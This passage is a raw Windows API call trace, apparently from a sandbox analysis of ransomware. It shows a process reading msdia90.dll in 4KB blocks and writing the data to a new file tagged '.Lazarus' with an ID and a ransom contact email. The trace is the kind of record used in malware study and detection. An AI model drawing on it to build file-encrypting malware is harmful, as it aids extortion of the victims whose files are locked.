returned 1 [0103.082] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.082] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.082] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0103.082] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0103.082] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0103.082] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.082] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.082] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0103.082] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0103.082] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35110 [0103.082] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0103.082] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35110 | out: hHeap=0x20000) returned 1 [0103.082] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0103.082] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0103.082] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0103.082] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0103.082] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0103.082] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0103.082] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0103.082] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60088 [0103.082] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0103.082] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0103.082] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6de98 [0103.082] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60088 | out: hHeap=0x20000) returned 1 [0103.082] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.082] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.082] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.082] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.082] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6de98 | out: hHeap=0x20000) returned 1 [0103.082] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0103.082] AreFileApisANSI () returned 1 [0103.082] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VC\\msdia90.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\VC\\msdia90.dll", lpUsedDefaultChar=0x0) returned 62 [0103.082] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0103.082] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.082] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.082] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0103.083] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0103.083] AreFileApisANSI () returned 1 [0103.083] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0103.083] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6de98 [0103.083] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6de98, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VC\\msdia90.dll") returned 62 [0103.083] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VC\\msdia90.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vc\\msdia90.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0103.083] GetFileType (hFile=0x368) returned 0x1 [0103.083] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6de98 | out: hHeap=0x20000) returned 1 [0103.083] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0103.083] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0103.084] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0103.084] CloseHandle (hObject=0x368) returned 1 [0103.084] AreFileApisANSI () returned 1 [0103.084] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0103.084] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6dfa8 [0103.084] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6dfa8, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VC\\msdia90.dll") returned 62 [0103.084] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VC\\msdia90.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vc\\msdia90.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0103.084] GetFileType (hFile=0x368) returned 0x1 [0103.084] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6dfa8 | out: hHeap=0x20000) returned 1 [0103.084] CloseHandle (hObject=0x368) returned 1 [0103.085] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.085] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0103.085] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0103.085] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.085] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0103.085] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0103.085] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.085] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.085] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.085] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0103.085] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.085] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0103.085] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.085] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.085] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.085] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0103.085] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0103.085] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0103.085] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0103.085] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0103.085] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0103.085] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.085] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0103.085] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0103.085] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0103.085] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0103.085] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.085] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.085] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.085] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0103.085] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0103.085] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.085] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.085] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0103.085] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0103.085] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.085] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0103.086] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0103.086] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.086] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.086] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.086] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0103.086] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.086] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0103.086] AreFileApisANSI () returned 1 [0103.086] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0103.086] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6e030 [0103.086] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6e030, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VC\\msdia90.dll") returned 62 [0103.086] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VC\\msdia90.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vc\\msdia90.dll"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfe87c00, ftCreationTime.dwHighDateTime=0x1cbfe36, ftLastAccessTime.dwLowDateTime=0x2ce22546, ftLastAccessTime.dwHighDateTime=0x1d327be, ftLastWriteTime.dwLowDateTime=0xcfe87c00, ftLastWriteTime.dwHighDateTime=0x1cbfe36, nFileSizeHigh=0x0, nFileSizeLow=0xd0d50)) returned 1 [0103.086] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e030 | out: hHeap=0x20000) returned 1 [0103.086] AreFileApisANSI () returned 1 [0103.086] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0103.086] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.086] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0103.086] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0103.086] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0103.086] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.086] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0103.086] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0103.086] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0103.086] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0103.086] GetLastError () returned 0x0 [0103.086] SetLastError (dwErrCode=0x0) [0103.086] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4dfc0 [0103.086] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x570e0 [0103.086] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b8b0 [0103.086] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d588 [0103.086] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d5a0 [0103.086] GetLastError () returned 0x0 [0103.086] SetLastError (dwErrCode=0x0) [0103.086] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0103.087] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd40 [0103.087] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x77) returned 0x69bb0 [0103.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd40 | out: hHeap=0x20000) returned 1 [0103.087] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb2) returned 0x4ebc8 [0103.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0103.087] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0103.087] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0103.087] AreFileApisANSI () returned 1 [0103.087] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ebc8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 124 [0103.087] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xf8) returned 0x976f0 [0103.087] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ebc8, cbMultiByte=-1, lpWideCharStr=0x976f0, cchWideChar=124 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VC\\msdia90.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 124 [0103.087] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VC\\msdia90.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\common files\\microsoft shared\\vc\\msdia90.dll.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0103.245] GetFileType (hFile=0x368) returned 0x1 [0103.245] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x976f0 | out: hHeap=0x20000) returned 1 [0103.245] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0103.246] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0103.246] AreFileApisANSI () returned 1 [0103.246] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0103.246] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6de98 [0103.246] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x6de98, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VC\\msdia90.dll") returned 62 [0103.246] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VC\\msdia90.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vc\\msdia90.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0103.246] GetFileType (hFile=0x27c) returned 0x1 [0103.246] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6de98 | out: hHeap=0x20000) returned 1 [0103.246] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a3b0 [0103.246] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0103.246] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0103.246] GetLastError () returned 0x0 [0103.246] SetLastError (dwErrCode=0x0) [0103.246] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f50 | out: hHeap=0x20000) returned 1 [0103.246] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0103.246] GetLastError () returned 0x0 [0103.246] SetLastError (dwErrCode=0x0) [0103.246] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0103.246] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0103.247] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x986d0 [0103.247] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0103.249] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0103.249] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d5b8 [0103.249] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x996d8 [0103.249] GetLastError () returned 0x0 [0103.249] SetLastError (dwErrCode=0x0) [0103.249] GetLastError () returned 0x0 [0103.249] SetLastError (dwErrCode=0x0) [0103.250] GetLastError () returned 0x0 [0103.250] SetLastError (dwErrCode=0x0) [0103.250] GetLastError () returned 0x0 [0103.250] SetLastError (dwErrCode=0x0) [0103.250] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.250] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.252] GetLastError () returned 0x0 [0103.252] SetLastError (dwErrCode=0x0) [0103.252] GetLastError () returned 0x0 [0103.252] SetLastError (dwErrCode=0x0) [0103.252] GetLastError () returned 0x0 [0103.252] SetLastError (dwErrCode=0x0) [0103.252] GetLastError () returned 0x0 [0103.252] SetLastError (dwErrCode=0x0) [0103.252] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.252] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.253] GetLastError () returned 0x0 [0103.253] SetLastError (dwErrCode=0x0) [0103.253] GetLastError () returned 0x0 [0103.253] SetLastError (dwErrCode=0x0) [0103.253] GetLastError () returned 0x0 [0103.253] SetLastError (dwErrCode=0x0) [0103.253] GetLastError () returned 0x0 [0103.253] SetLastError (dwErrCode=0x0) [0103.253] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.253] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.254] GetLastError () returned 0x0 [0103.254] SetLastError (dwErrCode=0x0) [0103.254] GetLastError () returned 0x0 [0103.254] SetLastError (dwErrCode=0x0) [0103.254] GetLastError () returned 0x0 [0103.254] SetLastError (dwErrCode=0x0) [0103.254] GetLastError () returned 0x0 [0103.254] SetLastError (dwErrCode=0x0) [0103.254] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.254] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.255] GetLastError () returned 0x0 [0103.255] SetLastError (dwErrCode=0x0) [0103.255] GetLastError () returned 0x0 [0103.255] SetLastError (dwErrCode=0x0) [0103.255] GetLastError () returned 0x0 [0103.255] SetLastError (dwErrCode=0x0) [0103.255] GetLastError () returned 0x0 [0103.255] SetLastError (dwErrCode=0x0) [0103.255] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.255] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.256] GetLastError () returned 0x0 [0103.256] SetLastError (dwErrCode=0x0) [0103.256] GetLastError () returned 0x0 [0103.256] SetLastError (dwErrCode=0x0) [0103.256] GetLastError () returned 0x0 [0103.256] SetLastError (dwErrCode=0x0) [0103.256] GetLastError () returned 0x0 [0103.256] SetLastError (dwErrCode=0x0) [0103.256] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.256] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.256] GetLastError () returned 0x0 [0103.256] SetLastError (dwErrCode=0x0) [0103.257] GetLastError () returned 0x0 [0103.257] SetLastError (dwErrCode=0x0) [0103.257] GetLastError () returned 0x0 [0103.257] SetLastError (dwErrCode=0x0) [0103.257] GetLastError () returned 0x0 [0103.257] SetLastError (dwErrCode=0x0) [0103.257] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.257] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.257] GetLastError () returned 0x0 [0103.257] SetLastError (dwErrCode=0x0) [0103.257] GetLastError () returned 0x0 [0103.258] SetLastError (dwErrCode=0x0) [0103.258] GetLastError () returned 0x0 [0103.258] SetLastError (dwErrCode=0x0) [0103.258] GetLastError () returned 0x0 [0103.258] SetLastError (dwErrCode=0x0) [0103.258] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.258] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.258] GetLastError () returned 0x0 [0103.258] SetLastError (dwErrCode=0x0) [0103.258] GetLastError () returned 0x0 [0103.258] SetLastError (dwErrCode=0x0) [0103.258] GetLastError () returned 0x0 [0103.259] SetLastError (dwErrCode=0x0) [0103.259] GetLastError () returned 0x0 [0103.259] SetLastError (dwErrCode=0x0) [0103.259] ReadFile (in: hFile=0x27c, 